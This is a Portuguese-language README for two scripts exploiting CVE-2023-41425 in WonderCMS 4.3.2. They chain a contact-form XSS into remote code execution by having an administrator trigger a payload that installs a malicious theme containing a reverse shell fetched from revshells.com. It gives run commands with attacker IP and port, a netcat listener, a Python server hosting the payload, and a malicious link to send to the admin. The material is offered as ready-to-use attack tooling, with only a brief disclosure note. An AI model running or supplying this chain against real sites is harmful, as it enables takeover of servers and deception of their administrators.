
WonderCMS 4.3.2 XSS to RCE Exploits
Visão Geral
Estes scripts exploram uma vulnerabilidade XSS (Cross-Site Scripting) no WonderCMS 4.3.2 para alcançar Execução Remota de Código (RCE). O payload XSS, quando acionado pelo administrador, instala automaticamente um reverse shell no servidor alvo, aproveitando um módulo de tema malicioso personalizado. O reverse shell é obtido do revshells.com e executado, concedendo ao atacante acesso remoto ao servidor.
Índice
Pré-requisitos
Para executar com sucesso qualquer um dos scripts, as seguintes ferramentas e condições são necessárias:
- Bash Shell: Ambos os scripts são escritos para ambientes Linux usando o shell Bash.
- netcat (nc): Usado para ouvir a conexão do reverse shell.
- Python3: Um servidor HTTP simples em Python é usado para hospedar o payload XSS.
- WonderCMS 4.3.2: O alvo deve estar executando uma versão vulnerável do WonderCMS.
- Interação do Administrador: O payload requer que um administrador acione o XSS, o que resulta na execução do reverse shell.
- revshells.com: O payload do reverse shell é baixado dinamicamente do revshells.com.
Script 1: Exploração Automática
POC
Pasted image 20241010021603
Funcionalidades
Esta versão da exploração verifica automaticamente se há um listener nc ativo, baixa o reverse shell, inicia o servidor HTTP, envia o payload e aguarda que o administrador acione o reverse shell.
- Configuração Automática do Reverse Shell: Baixa um reverse shell pré-gerado do revshells.com.
- Injeção de Payload XSS: Injeta um payload XSS no formulário de contato do alvo.
- Gerenciamento do Servidor HTTP: Inicia automaticamente um servidor HTTP Python para hospedar o payload do reverse shell.
- Verificação do Listener nc: Garante que o listener esteja em execução antes de prosseguir.
- Envio Automático do Payload: Envia o payload automaticamente sem interação do usuário.
Uso
- Certifique-se de que o listener
nc está em execução na porta especificada:
- Execute o script com o seguinte comando:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Exemplo:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Fluxo de Trabalho
- Download do Reverse Shell: O script baixa o reverse shell do
revshells.com.
- Modificação do Reverse Shell: O script do reverse shell é atualizado com o IP e porta do atacante.
- Criação do Payload ZIP: Um arquivo ZIP contendo o reverse shell é criado.
- Elaboração do Payload XSS: Um payload XSS que instala o reverse shell é gerado e injetado no formulário de contato vulnerável.
- Início Automático do Servidor HTTP: O script inicia um servidor HTTP Python para servir o payload malicioso.
- Envio Automático do Payload: O payload XSS é enviado ao administrador automaticamente.
Script 2: Exploração Manual
POC
Pasted image 20241010013048
Use o exploit fornecido pelo script no campo Website...
Pasted image 20241010013218
Funcionalidades
Esta versão exige que o usuário gerencie manualmente o listener nc e o acionamento do payload XSS. É mais adequada para cenários onde processos automáticos não são desejáveis.
- Configuração Manual do Reverse Shell: O usuário é responsável por garantir que o listener esteja em execução.
- Acionamento Manual do XSS: O script fornece o link malicioso a ser enviado ao administrador, mas o payload deve ser acionado manualmente.
- Gerenciamento do Servidor HTTP: Inicia um servidor HTTP Python para hospedar o payload XSS.
Uso
- Certifique-se de que o listener
nc está em execução na porta especificada:
- Execute o script com o seguinte comando:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Exemplo:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Fluxo de Trabalho
- Download do Reverse Shell: Baixa um reverse shell do
revshells.com.
- Modificação do Reverse Shell: Atualiza o reverse shell com o IP e porta do atacante.
- Criação do Payload ZIP: Cria um arquivo ZIP contendo o reverse shell.
- Elaboração do Payload XSS: Gera um payload XSS que instala o reverse shell.
- Exibição do Link Malicioso: Exibe o link que precisa ser enviado ao administrador para acionamento.
- Início do Servidor HTTP: Inicia um servidor HTTP Python para hospedar o payload.
Notas
- Interação do Administrador: Ambas as explorações dependem de o administrador do WonderCMS acionar o payload XSS ao visitar a página vulnerável. Uma vez acionado, o reverse shell é estabelecido com a máquina do atacante.
- Firewall/IDS/IPS: Tenha cuidado ao executar essas explorações em ambientes protegidos por firewalls ou Sistemas de Detecção de Intrusão (IDS) que possam bloquear ou alertar sobre atividades suspeitas.
- Divulgação Responsável: Se você descobrir que um alvo está vulnerável, sempre siga as diretrizes éticas e reporte a vulnerabilidade às partes apropriadas.
Licença